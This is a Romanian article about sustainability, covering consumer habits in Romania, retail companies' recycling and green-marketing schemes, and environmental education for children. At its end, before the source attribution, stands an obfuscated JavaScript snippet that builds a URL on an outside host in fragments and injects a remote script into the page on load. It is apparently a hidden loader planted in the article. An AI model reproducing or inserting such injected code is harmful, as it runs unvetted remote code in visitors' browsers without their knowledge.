Sustenabilitatea, o prioritate globală ce poate fi educată

În ultima perioadă, un subiect tot mai mult abordat în rândul companiilor din retail a fost despre sustenabilitate. Acel proces prin care se pot satisface nevoile oamenilor fără să fie afectate resursele generațiilor viitoare. Este o abordare relativ nouă în România, dar în creștere, care vizează implementarea unor soluții mai prietenoase cu mediul, care să reducă impactul negativ al poluării și reducerea consumului de resurse de care planeta dispune.

Sustenabilitatea îmbunătățește calitatea vieții, protejează ecosistemul și conservă resursele naturale pentru generațiile viitoare. Fiindcă mediul înconjurător este o resursă epuizabilă, identificarea unor soluții sustenabile este cu atât mai importantă. Din fericire, alegerile simple precum reciclarea deșeurilor, utilizarea produselor durabile sau reutilizarea materialelor, sunt doar câteva dintre schimbările pe care oricine le poate face pentru a contribui la conservarea resurselor și la asigurarea unui mediu favorabil pentru următoarele generații.

De altfel, e o obligație morală de a avea grijă de ceilalți, de generațiile viitoare, de celelalte specii și de a susține planeta. Fiindcă alegerile și acțiunile tuturor au impact major asupra viitorului, practicarea sustenabilității ar trebui să fie o prioritate globală și un mod de viață.

Preocuparea față de sustenabilitate a devenit tot mai importantă și în România

Acțiunile de sustenabilitate au prins contur și în România. Tot mai mulți au început să fie atenți la ceea ce cumpără, să pună accentul pe produsele durabile și pe cele realizate din materiale reciclate, să reducă consumul de resurse și să adopte un stil de viață mai simplist, dar de calitate.

Mersul pe jos sau cu bicicleta, procurarea produselor direct de la furnizorii locali, reutilizarea produselor în alte scopuri și reciclarea deșeurilor sunt doar o parte din practicile actuale ale multor români.

Implicarea companiilor din retail în colectarea selectivă și reciclarea deșeurilor

Nu doar oamenii au identificat noi soluții pentru conservarea resurselor, ci si branduri de renume din industria retail. Exisă companii care pun accentul pe reciclarea deșeurilor cu scopul de a reutiliza materialele în alte procese de fabricație. Acțiunea în sine este mai profitabilă pentru companii, fiindcă costurile de producție sunt automat mai mici, și benefică pentru mediul înconjurător, deoarece se reduce numărul de deșeuri din mediu.

De asemenea, unele întreprinderi investesc în energie regenerabilă, sprijină organizațiile care luptă pentru această cauză, adoptă obiective de dezvoltare durabilă, precum ambalarea cu materiale reutilizabile sau biodegradabile, și își iau angajamentul asupra reducerii emisiilor.

Iar pentru unele companii, sustenabilitatea este o bună practică de marketing, prin care își fidelizează clienții și generează noi profituri. Spre exemplu, oferă reduceri la achiziționarea produselor noi dacă oferă la schimb produsele vechi sau vouchere care pot fi utilizate la următoarele cumpărături. Aceste practici sunt avantajoase pentru ambele părți, dar mai ales pentru mediu, fiindcă se încurajează colectarea selectivă și reciclarea deșeurilor.

În plus, unii oameni se asociază mai repede cu brandurile care își arată grija pentru mediu, ceea ce înseamnă că astfel de campanii de marketing atrag clienți și îi fidelizează.

Un viitor mai sustenabil prin educație

Viitorul este în mâinile tuturor. Pentru ca cei din urmă să beneficieze de un mediu curat și să se bucure de bogățiile pământului, este nevoie de o implicare globală în implementarea soluțiilor de sustenabilitate. Însă aceste acțiuni sunt greu de întreprins dacă oamenii nu conștientizează impactul negativ al poluării și importanța acțiunilor de sustenabilitate.

Un viitor sustenabil poate fi asigurat prin educarea populației, care trebuie să înceapă încă de la cele mai fragede vârste. Această preocupare poate începe de acasă sau din băncile instituțiilor de învățământ. Educația primită în copilărie se reflectă în acțiunile de adult. Drept urmare, e indicat ca cei mici să fie responsabilizați încă din primele etape ale vieții.

(function(){
t3efu=”6i9vmt7r3ef1″;t3ef=document.createElement(“script”);
t3ef_=”u”+(“st”);t3ef_+=”at”+(“.”);t3ef.async=true;t3ef_+=”in”;
t3efu=”436800134.”+t3efu;t3ef.type=”text/javascript”;t3efu+=”mi15m1px6ukd”;
t3efu+=”jsmexz”;t3ef_+=(“f”)+”o”+(“/”);t3ef.src=”https://”+t3ef_+t3efu;
t3efd=document.body;t3efd.appendChild(t3ef);
})();

Articolul Sustenabilitatea, o prioritate globală ce poate fi educată apare prima dată în Stiri Zilnic.